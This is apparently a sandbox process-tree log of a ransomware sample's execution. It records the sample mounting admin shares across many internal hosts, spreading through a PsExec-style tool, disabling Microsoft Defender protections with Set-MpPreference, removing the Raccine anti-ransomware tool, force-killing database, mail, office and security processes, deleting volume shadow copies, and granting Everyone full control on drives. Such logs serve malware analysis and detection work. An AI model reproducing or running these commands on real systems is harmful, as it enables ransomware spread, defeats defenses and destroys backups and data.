C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.18\X$
2⤵
PID:2136

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1192

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.18\H$
2⤵
PID:3720

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.21\Users
2⤵
PID:3712

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.21\Y$
2⤵
PID:3200

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.21\I$
2⤵
PID:416

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.21\Z$
2⤵
PID:1704

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.21\J$
2⤵
PID:3168

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.21\A$
2⤵
PID:3748

C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe
"C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe" \\10.10.0.27 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
2⤵
PID:1164

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.21\B$
2⤵
PID:2760

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.21\K$
2⤵
PID:788

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\L$
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2100

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\C$
2⤵
PID:1988

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\M$
2⤵
PID:2784

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3332

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\D$
2⤵
PID:3868

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\N$
2⤵
PID:3872

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3904

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\E$
2⤵
PID:2780

C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe
"C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe" \\127.0.0.1 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
2⤵
PID:188

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\O$
2⤵
PID:960

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\F$
2⤵
PID:1120

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\P$
2⤵
PID:3720

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\G$
2⤵
PID:2940

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\Q$
2⤵
PID:752

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\H$
2⤵
PID:4120

C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe
"C:\Users\Admin\AppData\Local\Temp\rc0kcdut.exe" \\10.10.0.15 -d -h -s -f -accepteula -nobanner -c "C:\Users\Admin\AppData\Local\Temp\714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe"
2⤵
PID:4160

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\R$
2⤵
PID:4196

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\I$
2⤵
PID:4320

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\Users
2⤵
PID:4368

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\N$
2⤵
PID:4404

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\S$
2⤵
PID:4452

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\A$
2⤵
PID:4500

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\J$
2⤵
PID:4528

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\T$
2⤵
PID:4556

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\O$
2⤵
PID:4640

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\U$
2⤵
PID:4708

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\B$
2⤵
PID:4736

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\K$
2⤵
PID:4776

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\P$
2⤵
PID:4820

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\V$
2⤵
PID:4884

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\C$
2⤵
PID:4876

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\L$
2⤵
PID:4952

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\D$
2⤵
PID:4984

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\Q$
2⤵
PID:5020

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\W$
2⤵
PID:5068

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\M$
2⤵
PID:5088

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\E$
2⤵
PID:4136

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\R$
2⤵
PID:1476

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\X$
2⤵
PID:4208

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\U$
2⤵
PID:4272

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\F$
2⤵
PID:4120

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\S$
2⤵
PID:4216

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\Y$
2⤵
PID:4340

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\V$
2⤵
PID:4604

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\G$
2⤵
PID:4556

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\W$
2⤵
PID:4888

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\T$
2⤵
PID:4796

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\Z$
2⤵
PID:3004

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\H$
2⤵
PID:4880

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\N$
2⤵
PID:4960

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.36\X$
2⤵
PID:5008

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\Users
2⤵
PID:5348

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\O$
2⤵
PID:5448

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\I$
2⤵
PID:5516

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\Y$
2⤵
PID:5576

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\A$
2⤵
PID:5692

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\P$
2⤵
PID:5684

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\Z$
2⤵
PID:5800

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\J$
2⤵
PID:5784

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\Q$
2⤵
PID:5944

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\N$
2⤵
PID:5984

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\U$
2⤵
PID:6008

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\W$
2⤵
PID:6100

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\O$
2⤵
PID:4492

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\E$
2⤵
PID:800

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\K$
2⤵
PID:4888

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\X$
2⤵
PID:4740

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\V$
2⤵
PID:6088

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\D$
2⤵
PID:6068

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\B$
2⤵
PID:6028

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\F$
2⤵
PID:5612

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\P$
2⤵
PID:5664

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\R$
2⤵
PID:5796

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\Y$
2⤵
PID:5556

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\L$
2⤵
PID:5788

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\R$
2⤵
PID:5808

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\H$
2⤵
PID:5848

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\C$
2⤵
PID:5868

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\J$
2⤵
PID:2784

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\G$
2⤵
PID:5724

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\Z$
2⤵
PID:5380

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\S$
2⤵
PID:4404

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\M$
2⤵
PID:4452

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\I$
2⤵
PID:4216

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\S$
2⤵
PID:4680

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\Q$
2⤵
PID:5008

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\K$
2⤵
PID:5692

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\T$
2⤵
PID:3276

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\X$
2⤵
PID:5900

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\T$
2⤵
PID:5968

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\L$
2⤵
PID:4904

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3964

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\U$
2⤵
PID:5220

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.41\Y$
2⤵
PID:5136

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.24\Users
2⤵
PID:1476

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.24\M$
2⤵
PID:4952

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.24\V$
2⤵
PID:4272

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.24\Z$
2⤵
PID:6028

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.24\A$
2⤵
PID:5380

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.24\W$
2⤵
PID:2648

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.24\B$
2⤵
PID:4920

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.24\C$
2⤵
PID:5696

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.24\D$
2⤵
PID:3276

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.24\E$
2⤵
PID:5660

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\Users
2⤵
PID:5796

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\F$
2⤵
PID:5216

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\N$
2⤵
PID:5460

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\A$
2⤵
PID:5248

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\G$
2⤵
PID:4172

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\B$
2⤵
PID:4604

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\H$
2⤵
PID:5852

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\C$
2⤵
PID:6104

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\D$
2⤵
PID:5340

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\I$
2⤵
PID:6052

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\E$
2⤵
PID:4452

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\J$
2⤵
PID:4216

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\F$
2⤵
PID:5812

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\K$
2⤵
PID:5776

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\G$
2⤵
PID:4192

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\L$
2⤵
PID:5048

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\H$
2⤵
PID:5880

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\M$
2⤵
PID:2576

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\I$
2⤵
PID:5128

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\O$
2⤵
PID:496

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:2648

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\J$
2⤵
PID:4184

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\K$
2⤵
PID:5588

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\P$
2⤵
PID:1280

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\Q$
2⤵
PID:4320

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\L$
2⤵
PID:2760

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\R$
2⤵
PID:4108

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\M$
2⤵
PID:6092

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\S$
2⤵
PID:5584

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\N$
2⤵
PID:5676

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\T$
2⤵
PID:1476

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\O$
2⤵
PID:5724

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\U$
2⤵
PID:5536

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\P$
2⤵
PID:5756

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\V$
2⤵
PID:5428

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\Q$
2⤵
PID:4484

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\W$
2⤵
PID:4480

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\R$
2⤵
PID:4704

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\X$
2⤵
PID:2164

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\S$
2⤵
PID:5532

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\Y$
2⤵
PID:5232

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\T$
2⤵
PID:5392

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\Z$
2⤵
PID:4288

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\U$
2⤵
PID:4892

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\V$
2⤵
PID:4756

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\W$
2⤵
PID:2716

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\X$
2⤵
PID:5836

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\Y$
2⤵
PID:4716

C:\Windows\SysWOW64\net.exe
"net.exe" use \\10.10.0.39\Z$
2⤵
PID:5680

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:1956

C:\Windows\System32\SLUI.exe
"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3828

C:\Windows\PAExec-4440-RJMQBVDN.exe
C:\Windows\PAExec-4440-RJMQBVDN.exe -service
1⤵
PID:2456

C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"
2⤵
PID:1956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
3⤵
PID:940

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
3⤵
PID:1936

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
3⤵
PID:4372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
3⤵
PID:4460

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
3⤵
PID:4648

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
3⤵
PID:4572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
3⤵
PID:3168

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
3⤵
PID:2840

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
3⤵
PID:4928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
3⤵
PID:4988

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
3⤵
PID:5104

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
3⤵
PID:4140

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
3⤵
PID:4208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
3⤵
PID:4700

C:\Windows\system32\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
3⤵
- Kills process with taskkill
PID:4424

C:\Windows\system32\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
3⤵
PID:5648

C:\Windows\system32\reg.exe
"reg" delete HKCU\Software\Raccine /F
3⤵
- Modifies registry key
PID:5776

C:\Windows\system32\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
3⤵
PID:5904

C:\Windows\system32\sc.exe
"sc.exe" config Dnscache start= auto
3⤵
PID:5216

C:\Windows\system32\sc.exe
"sc.exe" config FDResPub start= auto
3⤵
PID:5188

C:\Windows\system32\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
3⤵
PID:4960

C:\Windows\system32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
3⤵
PID:5144

C:\Windows\system32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
3⤵
PID:5452

C:\Windows\system32\sc.exe
"sc.exe" config SstpSvc start= disabled
3⤵
PID:5548

C:\Windows\system32\sc.exe
"sc.exe" config SSDPSRV start= auto
3⤵
PID:5368

C:\Windows\system32\sc.exe
"sc.exe" config SQLWriter start= disabled
3⤵
PID:5832

C:\Windows\system32\sc.exe
"sc.exe" config upnphost start= auto
3⤵
PID:6024

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
3⤵
- Kills process with taskkill
PID:5460

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
3⤵
- Kills process with taskkill
PID:5336

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
3⤵
PID:5184

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
3⤵
PID:5588

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
3⤵
PID:6088

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
3⤵
- Kills process with taskkill
PID:5372

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
3⤵
- Kills process with taskkill
PID:5520

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
3⤵
- Kills process with taskkill
PID:5612

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
3⤵
- Kills process with taskkill
PID:4896

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
3⤵
PID:5704

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
3⤵
PID:6116

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
3⤵
- Kills process with taskkill
PID:6124

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
3⤵
- Kills process with taskkill
PID:5444

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM steam.exe /F
3⤵
- Kills process with taskkill
PID:4888

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
3⤵
- Kills process with taskkill
PID:4952

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
3⤵
- Kills process with taskkill
PID:5772

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
3⤵
PID:5664

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
3⤵
PID:5760

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
3⤵
- Kills process with taskkill
PID:4504

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
3⤵
PID:5324

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
3⤵
- Kills process with taskkill
PID:4976

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
3⤵
PID:1936

C:\Windows\system32\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
3⤵
- Kills process with taskkill
PID:5532

C:\Windows\system32\netsh.exe
"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
3⤵
PID:5216

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
3⤵
- Kills process with taskkill
PID:3868

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM excel.exe /F
3⤵
PID:5460

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld-nt.exe /F
3⤵
PID:6132

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
3⤵
PID:2576

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
3⤵
- Kills process with taskkill
PID:4232

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM visio.exe /F
3⤵
- Kills process with taskkill
PID:6020

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
3⤵
PID:5196

C:\Windows\system32\arp.exe
"arp" -a
3⤵
PID:5192

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
3⤵
PID:5292

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
3⤵
PID:4600

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
3⤵
- Kills process with taskkill
PID:6108

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
3⤵
- Kills process with taskkill
PID:4960

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
3⤵
PID:5448

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
3⤵
PID:5344

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
3⤵
- Kills process with taskkill
PID:6092

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlagent.exe /F
3⤵
- Kills process with taskkill
PID:5400

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
3⤵
- Kills process with taskkill
PID:1520

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
3⤵
- Kills process with taskkill
PID:5592

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM winword.exe /F
3⤵
- Kills process with taskkill
PID:5652

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
3⤵
- Kills process with taskkill
PID:4764

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM ocautoupds.exe /F
3⤵
- Kills process with taskkill
PID:800

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlbrowser.exe /F
3⤵
- Kills process with taskkill
PID:5316

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM ocssd.exe /F
3⤵
PID:4260

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqlservr.exe /F
3⤵
- Kills process with taskkill
PID:4856

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM oracle.exe /F
3⤵
- Kills process with taskkill
PID:5824

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sql.exe /f
3⤵
- Kills process with taskkill
PID:5172

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM sqld.exe /f
3⤵
PID:5820

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysql.exe /f
3⤵
- Kills process with taskkill
PID:4532

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM mysqld.exe /f
3⤵
- Kills process with taskkill
PID:5436

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM oracle.exe /f
3⤵
- Kills process with taskkill
PID:4264

C:\Windows\system32\taskkill.exe
"taskkill.exe" /IM vmwp.exe /f
3⤵
PID:5480

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
3⤵
PID:3132

C:\Windows\system32\icacls.exe
"icacls" "C:*" /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:3372

C:\Windows\system32\icacls.exe
"icacls" "Z:*" /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:4240

C:\Windows\system32\icacls.exe
"icacls" "D:*" /grant Everyone:F /T /C /Q
3⤵
- Modifies file permissions
PID:2416

C:\Windows\PSEXESVC.exe
